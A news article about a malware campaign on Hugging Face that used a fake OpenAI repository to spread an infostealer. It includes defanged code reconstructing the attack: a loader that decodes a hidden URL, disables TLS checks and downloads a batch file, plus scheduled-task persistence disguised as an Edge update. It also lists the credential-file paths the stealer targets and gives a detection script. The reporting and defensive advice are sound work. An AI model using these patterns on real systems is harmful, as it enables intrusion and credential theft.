The latest Hugging Face malware incident has raised serious concerns in the AI industry after attackers disguised malicious software as an OpenAI release. Security experts warn that fake AI repositories are a growing threat to developers, companies, and researchers who rely on public AI platforms.
A new cybersecurity incident involving Hugging Face malware has exposed how dangerous public AI repositories can become when attackers hide malicious software inside seemingly trusted AI tools. Security researchers from HiddenLayer revealed that a fake AI repository pretending to be an OpenAI project managed to attract massive attention before finally being removed.
The malicious repository, called “Open-OSS/privacy-filter,” almost perfectly imitated a legitimate OpenAI Privacy Filter release. According to researchers, the attackers duplicated the original project description and added harmful files designed to infect users’ systems once executed.
The fake repository reportedly logged nearly 244,000 downloads before being taken offline. However, researchers believe the attackers may have artificially inflated download counts and likes to push the project into Hugging Face’s trending section. In less than a day, the repository had collected hundreds of likes, making it appear trustworthy to developers and AI enthusiasts.
This Hugging Face malware campaign mainly targeted Windows users. The fake project’s setup instructions told victims to run a batch file such as “start.bat” or execute Python scripts directly; doing so triggered malware hidden inside a file called loader.py, the first step in the infection chain.
Researchers explained that the malicious script initially looked like a normal AI model loader. Behind the scenes, though, it secretly downloaded additional harmful payloads from remote servers. The attackers also disabled SSL verification and used encoded URLs to hide their infrastructure from detection.
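HiddenLayer has not published the loader’s full source, but the behaviors it describes map onto a well-known pattern. The defanged Python sketch below is a reconstruction under those assumptions: the file names, variable names, and URL are invented, and the decoded address points at a reserved example domain rather than real attacker infrastructure.

```python
# Illustrative, defanged reconstruction of the loader pattern described in
# the report. A real start.bat would simply run "python loader.py" so the
# victim never inspects this code directly.
import base64
import ssl
import urllib.request

# The payload server is shipped only as a Base64 string, so the raw URL
# never appears in the source (example value; decodes to example.invalid).
_ENCODED = "aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvcGF5bG9hZC5iYXQ="
payload_url = base64.b64decode(_ENCODED).decode()

# Certificate verification is disabled, so the download succeeds even
# behind interception proxies or with a throwaway self-signed certificate.
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

with urllib.request.urlopen(payload_url, context=ctx) as resp:
    open("update.bat", "wb").write(resp.read())  # next-stage batch file
```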
Once installed, the malware downloaded another batch file and created scheduled tasks on infected systems to maintain long-term access. To avoid suspicion, the scheduled tasks were designed to resemble legitimate Microsoft Edge update processes.
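Here is a minimal sketch of that persistence step, assuming the standard Windows schtasks utility; the task name, target path, and schedule are hypothetical, chosen only to show how such a task can blend in with the genuine MicrosoftEdgeUpdate* jobs already present on most Windows machines.

```python
# Hypothetical reconstruction of the persistence step (Windows-only).
# HiddenLayer reported only that the tasks imitated Microsoft Edge update
# jobs; the real Edge updater registers tasks with names like
# "MicrosoftEdgeUpdateTaskMachineCore", which makes the disguise effective.
import subprocess

subprocess.run([
    "schtasks", "/Create",
    "/TN", "MicrosoftEdgeUpdateTaskMachineCoreX",  # blends in with real Edge tasks
    "/TR", r"C:\Users\Public\update.bat",          # the downloaded batch file
    "/SC", "MINUTE", "/MO", "30",                  # re-run every 30 minutes
    "/F",                                          # silently overwrite if it exists
], check=False)
```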
The final payload turned out to be a Rust-based infostealer capable of extracting highly sensitive information from infected computers. Security experts said the malware specifically targeted Chromium-based browsers, Firefox, Discord storage data, cryptocurrency wallets, FileZilla configurations, and key system details.
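The report names data categories rather than exact paths, but the default on-disk locations for those categories are well known. The checklist below (with Exodus as one example wallet application) can help triage whether a machine held data of the kinds the stealer targets; all paths are standard Windows defaults, not details taken from the HiddenLayer analysis.

```python
# Default locations for the data categories listed above. Exact paths vary
# by installation; these are the common defaults, useful as a triage
# checklist when assessing a possibly infected Windows machine.
import os

expand = os.path.expandvars
TARGETS = {
    "Chromium logins":  expand(r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data"),
    "Chromium cookies": expand(r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Network\Cookies"),
    "Firefox profiles": expand(r"%APPDATA%\Mozilla\Firefox\Profiles"),
    "Discord storage":  expand(r"%APPDATA%\discord\Local Storage\leveldb"),
    "FileZilla config": expand(r"%APPDATA%\FileZilla\sitemanager.xml"),
    "Exodus wallet":    expand(r"%APPDATA%\Exodus\exodus.wallet"),  # one example wallet app
}

for label, path in TARGETS.items():
    print(f"{label:18} {'present' if os.path.exists(path) else 'absent '} {path}")
```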
Researchers also warned that the malware attempted to disable Windows security protections, including antimalware scanning and event tracing (on Windows, the Antimalware Scan Interface and Event Tracing for Windows). This allowed the attackers to operate more quietly and collect information without being noticed immediately.
The wider issue highlighted by this Hugging Face malware attack is the growing security risk connected to AI development workflows. Modern AI repositories often contain executable scripts, setup files, notebooks, dependencies, and automation tools. While developers usually focus on the AI model itself, attackers increasingly use these additional files to distribute malware.
Cybersecurity experts believe public AI registries are quickly becoming attractive targets because many developers directly clone repositories into corporate environments. These systems often contain source code, cloud credentials, internal company data, and access to sensitive infrastructure. A single compromised AI repository could therefore open the door to a much larger organizational breach.
Researchers from HiddenLayer discovered several additional Hugging Face repositories using nearly identical malicious code and infrastructure. This suggests the operation may be part of a broader campaign targeting AI developers and companies experimenting with open-source AI tools.
The attack also follows earlier reports involving poisoned AI software packages and fake installers distributed through public repositories. Experts now warn that attackers increasingly see AI ecosystems as an effective entry point into secure business networks.
Industry analysts say traditional software security tools are not fully prepared for these newer AI-related threats. Many standard scanning systems mainly inspect software libraries and dependency lists, while malicious scripts hidden in AI setup files can bypass detection more easily.
Security professionals are now urging organizations to adopt stronger controls for AI assets and repositories. Experts recommend carefully reviewing AI setup scripts before execution, avoiding unknown repositories, and monitoring any executable components bundled with AI projects.
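As a rough illustration of that advice, the sketch below greps a freshly cloned repository for the red flags seen in this campaign before anything is executed. The pattern list and file-type filter are assumptions drawn from the behaviors described above, not a complete detector.

```python
# A minimal pre-execution check, not a substitute for manual review: flag
# the red-flag patterns from this campaign (disabled TLS verification,
# Base64-decoded literals, scheduled-task creation, script execution).
import pathlib
import re

RED_FLAGS = {
    "TLS verification disabled": re.compile(r"verify\s*=\s*False|CERT_NONE"),
    "Base64 decode of literal":  re.compile(r"b64decode\s*\(\s*[\"']"),
    "Scheduled task creation":   re.compile(r"schtasks\s+/Create", re.IGNORECASE),
    "Batch/script execution":    re.compile(r"\b(start\.bat|subprocess\.run|os\.system)\b"),
}

def scan_repo(root: str) -> None:
    for path in pathlib.Path(root).rglob("*"):
        if path.suffix not in {".py", ".bat", ".sh", ".ps1"}:
            continue
        text = path.read_text(errors="ignore")
        for label, pattern in RED_FLAGS.items():
            if pattern.search(text):
                print(f"[!] {path}: {label}")

scan_repo(".")  # run against a freshly cloned repository before executing anything
```

Any hit warrants a closer look before a single script is run; none of these patterns is malicious on its own, which is exactly why dependency-focused scanners tend to miss them.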
HiddenLayer advised anyone who downloaded the fake OpenAI repository and executed its files on Windows systems to immediately treat their machines as compromised. The company recommended re-imaging infected systems and resetting browser sessions because stolen session cookies may allow attackers to bypass multi-factor authentication protections.
In our opinion, this Hugging Face malware incident is another warning sign that the rapid growth of AI technology is also creating new cybersecurity challenges. As AI adoption continues to expand across businesses and research communities, developers must become far more cautious about trusting public repositories without proper verification.
The AI industry is moving extremely fast, but security awareness must move even faster.